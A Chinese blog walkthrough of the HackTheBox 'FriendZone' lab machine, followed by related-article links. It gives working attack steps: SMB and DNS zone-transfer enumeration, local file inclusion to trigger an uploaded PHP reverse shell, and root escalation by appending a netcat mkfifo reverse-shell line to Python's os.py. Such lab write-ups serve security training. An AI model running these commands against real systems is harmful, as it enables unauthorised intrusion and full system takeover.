HACKTHEBOX--FriendZone

已于 2024-05-26 21:47:41 修改
阅读量1.6k 收藏 41
点赞数 22
文章标签: linux 服务器 网络
于 2024-05-26 21:24:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/renielnxy/article/details/139220238
版权

1,扫描:

nmap -Pn -sC  -sV  -vvv   10.10.10.123

扫描结果显示,主机大概率为Linux,且开启了多个端口,我们可以逐一进行分析

445Samba端口

目标开启了445端口,我们可以用nmap进行枚举目录

nmap --script=smb-enum-shares.nse  10.10.10.123  -v

我们可以发现,存在多个共享目录,其中比较有价值的是/general和/Development可以发现这两个目录可以进行匿名登录,并且会存在读写权限

我们依次进行测试

smbclient -N //10.10.10.123/general   //Development

在这两个目录中我们可以得到一个文档,里面存放着可能是某系统的登录方式

至此,目前的Samba没什么价值了

80http端口

我们直接访问http://10.10.10.123

发现了一个域名,先挂上

echo '10.10.10.123 friendzoneportal.red' | tee -a /etc/hosts

仍后重新访问这个域名,发现同上方,通过查看源码和枚举目标目录也没有发现什么价值

53DNS端口
 

对于DNS端口我们可以先行测试是否存在DNS域传输

dig @10.10.10.123 axfr friendzone.red

存在,把域名挂上后,再进行依次访问

443https端口

我们此时已经得到多个域名,依次访问

其中发现这个域名存在一个文件上传功能,但是经过测试发现这个上传功能就目前而言并没有实际意义,并且不一定是真的

继续访问发现一个登录系统,这时候用之前发现的文档进行登录,发现可以登录成功

登录后依照,提升可以访问这个界面,其中大概可以了解到,

我们可以通过  ?image_id=a.jpg&pagename= 来进行目录访问

尝试构建

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=../../../../../etc/passwd

发现无法访问,这时候我们可以尝试访问dashboard

所以构建

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=dashboard

成功访问,这时候我们就可以尝试利用之前的Samba上传一个shell了,并且由于Samba在进行目录枚举的时候发现了目录,并且进行直接访问

shell文件可以利用kali自带的php-reverse-shell.php,注意不要忘记更改IP和端口,并且要在本地nc目标端口

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/phpshell.php

构建如上命令尝试进行访问后,会成功拿到shell

python -c 'import pty;pty.spawn("/bin/bash")'

输入如下命令,进入一个标准的bash,并且发现此时用户权限为www-data

此时,可以尝试得到用户flag,

得到后,再去到网页目录上,发现mysql_data.conf,并得到如上信息,

这时候,尝试ssh访问目标,

ssh friend@10.10.10.123

发现成功访问并且得到friend用户权限,此时开始提权

提权!

此时我们得到了www-data和friend这两个用户,我们可以通过一些脚本来帮助提权,这里我们先使用一个名为pspy的动态命令检测(GitHub - DominicBreuker/pspy: Monitor linux processes without root permissions

目标主机为64位,下载对应版本,并且进行上传

chmod +x pspy64 //提升至可运行权限
./pspy //运行

我们仔细观察一会,会发现系统会周期性运行其中的两个文件,一个为:

/bin/sh -c /opt/server_admin/reporter.py 

另一个则为:

/usr/bin/python /opt/server_admin/reporter.py 
 

此时我们立刻可以想到通过修改目标文件进行反弹shell因为运行目标文件的权限为root,这样就可以成功提权,理论存在实践开始。

我们并不能直接修改这两个文件,很显然我们没有他们的写权限,但是很幸运的是,目前文件里存在 “import os” 这会链接python的os库,我们可以修改os库来实现修改文件的目地

我们使用friend用户构建如下命令

vi /usr/lib/python2.7/os.py

并且在最下方加上

system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 1234 >/tmp/f")

这个命令,记得修改IP和对于端口,这样再下一个运行周期,我们就可以得到对方的反shell了

至此,渗透完成,这台主机还是很有意思的,可以自己试一试,并且再web端其实存在着另一个漏洞,我们下次继续!

LlNingyu
关注
hackthebox-friendzone(考点:smb/dns/文件包含/linux修改脚本)
冬萍子癸水
04-14 563
nmap 看到21/139/445就要想到ftp&smb利用,看里面是否藏有敏感信息文件 看到53就要想到dns,修改/etc/hosts,添加10.10.10.123 friendzone.htb 先看ftp,登录不上 再看smb 四个常用指令,都看看,拿越多信息越好 smbmap -H 10.10.10.123 smbclient --list friendzone.htb -U...
打靶日记--hackthebox--IClean
qq_64036695的博客
04-15 1014
linux在/etc/hosts手动将域名映射到特定的 IP 地址,从而绕过 DNS 解析的需要,windows则在C:\Windows\System32\drivers\etc做添加:(我这里是linux)可以以root权限执行,那么以前打ctf的知识就用上了哈哈哈哈,把root用户的ssh私钥嵌入到pdf中,攻击机去下载,使用ctf常用工具binwalk分离文件,然后得到ssh私钥登录root用户,直接拿下!它设置一个端口转发配置,将目标计算机上端口 3306 的连接转发到本地主机上的端口 3306。
HackTheBox::FriendZone
aya3t的博客
10-12 304
HackTheBox::FriendZone
Hack the box靶机 friendzone
菜浪马废的博客
05-24 265
之前得到一个账号 登录一下 上传文件
Hack The BoxLinux练习-- FriendZone
人间体佐菲的博客
11-21 462
Hack The BoxLinux练习-- FriendZone
No.152-HackTheBox-Linux-FriendZone-Walkthrough渗透学习
qq_34801745的博客
06-30 445
** HackTheBox-Linux-FriendZone-Walkthrough ** 靶机地址:https://www.hackthebox.eu/home/machines/profile/173 靶机难度:初级(4.7/10) 靶机发布日期:2019年5月13日 靶机描述: FriendZone is an easy difficulty Linux box which needs fair amount enumeration. By doing a zone transfer vhosts a
HackTheBox - Friendzone Write Up
ak.Gh0st的博客
05-12 531
HackTheBox - Friendzone Write Up
HackTheBox-CTF-Writeups:此备忘单旨在面向CTF玩家和初学者,以帮助他们根据操作系统和难度对Hack The Box Labs进行分类
05-06
HackTheBox CTF速查表 该备忘单面向CTF玩家和初学者,可帮助他们根据操作系统和难度对Hack The Box Labs进行分类。 此列表包含hackingarticles上所有可用的Hack The Box文章。 我们已经根据我们的经验执行并编制了此...
Stego-Challenges-HackTheBox-Write-Ups:Hack The Box带来的Stego挑战| Walkthoughs写ups
03-21
在IT安全领域,尤其是黑客挑战平台如Hack The Box(HTB)中,"Stego"是一种常见的挑战类型,它涉及到隐藏信息的技术,通常被称为隐写术。隐写术是一种利用图像、音频、文本等载体秘密传输信息的方法。在这个特定的...
Hack The Box-Crocodile
ffff5的博客
12-16 444
Hack The Box基础靶机Crocodile通关记录!
Hack The Box - Fawn关卡教程
Atopos545的博客
01-26 1817
这一关就是熟悉一下ftp服务,一些前置知识会写在过程里面。
Linux网络协议socket
Au_ust的博客
11-05 1426
我们之前学的通信是本地进程间通信,如果我们想在网络间通信的话,就需要用到二者的ip地址,分别被称为源IP地址和目的IP地址,被存入ip数据包中,其次我们还需要遵循一些通信协议。TCP协议:传输层协议,有连接,可靠传输,面向字节流(无明确边界的字节序列),难UDP协议:传输层协议,无连接,不可靠传输,面向数据流(以数据包为单位),简单网络通信的本质也是进程间通信,你怎么知道你要和哪个进程通信?
Linux】阿里云服务器搭建gradio实例
最新发布
Explore_Zhou
11-13 923
因为课程原因,需要做一个大模型相关的大作业,想到之前买的阿里云服务器,便想在服务器基于大模型API部署一个聊天机器人。因为是新手,特地做个记录,供初学者参考。从上面安装的几个软件来看,其实Linux端安装软件还是有规律可循的,主要就是那么几步:configure,make,make installlink1link2。
gdb编译教程(支持linux下X86和ARM架构)
weixin_43246170的博客
11-12 180
5、我们先开始x86版本,这个比较简单,不需要配置交叉编译工具(当然前提是系统装了gcc和g++的环境啊)。将gdb文件拷贝到对应平台下,即可使用。(或者使用gdbserver远程调试)以上这些配置都是要跟在./configure后面的。3、解压,然后进入到目录下,打开当前目录的命令行窗口。2、下载完后拷贝到linux的x86系统。先清理下编译x86残留下的临时文件。6、限制我们来编译ARM版本。4、创建一个生成目录。我下载的8.2版本。
连接实验室服务器并创建虚拟环境,从本地上传文件到linux服务器,使用requirement.txt安装环境需要的依赖的方法及下载缓慢的解决方法(Linux)
aha_xigua的博客
11-12 320
现在你已经成功创建并激活了一个新的conda环境。如果返回了版本信息,说明conda已经安装。如果没有安装,你需要先安装conda。创建一个新的conda环境。在你的个人计算机上打开终端(命令行界面)。输入密码后,你将成功连接到实验室服务器。三、利用conda创建环境。
Linux】内核模版加载modprobe | lsmod
binqian的专栏
11-13 185
modprobe是一个强大的工具,用于管理和操作 Linux 内核模块。通过使用modprobe,您可以轻松地加载、卸载和管理模块,确保系统在需要时能够正确加载所需的模块。
Linux ssh 基础教程
tangPHP的博客
11-13 557
SSH是一种安全协议,用作远程连接Linux服务器的主要手段。它通过生成远程shell提供基于文本的界面。连接之后,在本地终端中键入的所有命令都将发送到远程服务器并在那里执行,一般说ssh即openssh。OpenSSH(Open Secure Shell),是一套安全的网络工具,它在不安全的网络上提供加密通信。它主要用于安全远程登录、文件传输和其他安全网络服务。
初识Linux · 消息队列和信号量
更新各种计算机技能~
11-13 383
对于消息队列,信号量,共享内存都是隶属于system V这个标准下的进程间通信,其实上文的共享内存已经是基本上快被淘汰的了,对于其他的两个,消息队列和信号量,我们这里主要是以介绍为主,怎么具体的使用就暂时先不介绍了,主要是通过原理和函数部分进行介绍。并且其实在网络部分,也会重新介绍信号量,所以这里我们主要是了解即可。
linux 下查看程序启动的目录
qq_39763510的博客
11-11 181
第一步、ps -ef | grep azkaban 查询出进程号。第二步、cd /proc/第三步 、cd 进程号。第四部 ll 查看详情。以azkaban为例。
hackthebox - reel
11-03
HackTheBox - Reel是一个在黑客社区非常受欢迎的虚拟机靶场。这个靶场的目标是通过渗透测试和攻击手法,找到并获得系统的管理员权限。靶场基于漏洞存在和网络安全问题,提供了一个真实的环境来练习和提升安全技能。 ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值